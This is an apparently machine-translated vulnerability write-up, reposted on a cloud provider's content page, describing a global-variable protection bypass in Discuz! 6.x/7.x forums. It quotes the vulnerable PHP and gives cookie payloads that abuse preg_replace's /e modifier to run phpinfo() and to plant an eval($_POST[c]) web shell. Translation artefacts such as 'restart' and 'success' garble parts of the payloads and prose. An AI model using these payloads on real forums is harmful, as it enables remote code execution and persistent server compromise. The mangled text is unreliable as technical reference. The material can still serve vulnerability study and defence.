Discuz! 6. x/7.x global variable protection bypass causes Command Execution

Source: Internet
Author: User

Discuz! 6. x/7.x global variable protection bypass causes Command Execution
Vulnerability Overview:

In php5.3.x, the default value of request_order in php. ini is GP, which leads to Discuz! 6. x/7.x global variable protection Bypass Vulnerability.

Vulnerability Analysis: include/global. func. php code:
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {    foreach($$_request as $_key => $_value) {        $_key{0} != '_' && $$_key = daddslashes($_value);    }}

Code that simulates the register_globals function. When the GPC is off, the addslashes () function is called to process the variable value, however, if you directly use a variable such as $ _ GET/$ _ POST/$ _ COOKIE, this does not work, however, in the source code of dz, few users directly use the $ _ GET/$ _ POST/$ _ COOKIE, and fewer vulnerabilities exist :(

However, there are other bypass methods. In register_globals = on, you can submit the GLOBALS variable to bypass the above Code. To prevent this, dz has the following code:
 

if (isset($_REQUEST['GLOBALS']) OR isset($_FILES['GLOBALS'])) {    exit('Request tainting attempted.');}

So we can't submit the GLOBALS variable?

$ _ REQUEST the value of this super global variable is subject to php. the effect of request_order in ini. In the latest php5.3.x series, the default value of request_order is GP, that is, $ _ REQUEST contains only $ _ GET and $ _ POST by default, without $ _ COOKIE, we can use COOKIE to submit the GLOBALS variable :)

Vulnerability Exploitation
Include/discuzcode. func. php
function discuzcode($message, $smileyoff, $bbcodeoff, $htmlon = 0, $allowsmilies = 1, $allowbbcode = 1, $allowimgcode =1, $allowhtml = 0, $jammer = 0, $parsetype = '0', $authorid = '0', $allowmediacode = '0', $pid = 0) {global $discuzcodes, $credits, $tid, $discuz_uid, $highlight, $maxsmilies, $db, $tablepre, $hideattach, $allowattachurl;if($parsetype != 1 && !$bbcodeoff && $allowbbcode && (strpos($message, '[/code]') || strpos($message, '[/CODE]')) !== FALSE) {$message = preg_replace("/\s?\[code\](.+?)\[\/code\]\s?/ies", "codedisp('\\1')", $message);}$msglower = strtolower($message);//$htmlon = $htmlon && $allowhtml ? 1 : 0;if(!$htmlon) {$message = $jammer ? preg_replace("/\r\n|\n|\r/e", "jammer()", dhtmlspecialchars($message)) : dhtmlspecialchars($message);}if(!$smileyoff && $allowsmilies && !empty($GLOBALS['_DCACHE']['smilies']) && is_array($GLOBALS['_DCACHE']['smilies'])) {if(!$discuzcodes['smiliesreplaced']) {foreach($GLOBALS['_DCACHE']['smilies']['replacearray'] AS $key => $smiley) {$GLOBALS['_DCACHE']['smilies']['replacearray'][$key] = '';}$discuzcodes['smiliesreplaced'] = 1;}$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);}

 

Note:

$ Message = preg_replace ($ GLOBALS ['_ DCACHE'] ['smilies '] ['searcharray'], $ GLOBALS ['_ dcache'] ['smilies'] ['replacearray'], $ message, $ maxsmilies) Success );

Cookie band in request

GLOBALS [_ DCACHE] [smilies] [searcharray] =/. */eui restart GLOBALS [_ DCACHE] [smilies] [replacearray] = phpinfo () Restart ();
You can run phpinfo.
GLOBALS [_ DCACHE] [smilies] [searcharray] = /. */eui restart GLOBALS [_ DCACHE] [smilies] [replacearray] = eval ($ _ POST [c]) % 3B success ;
That is, a Trojan.

After that, the vulnerabilities were hidden and not easily discovered.

Condition of exploits:

1. discuz 6.x/7.x

2. The default value of request_order is GP.


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.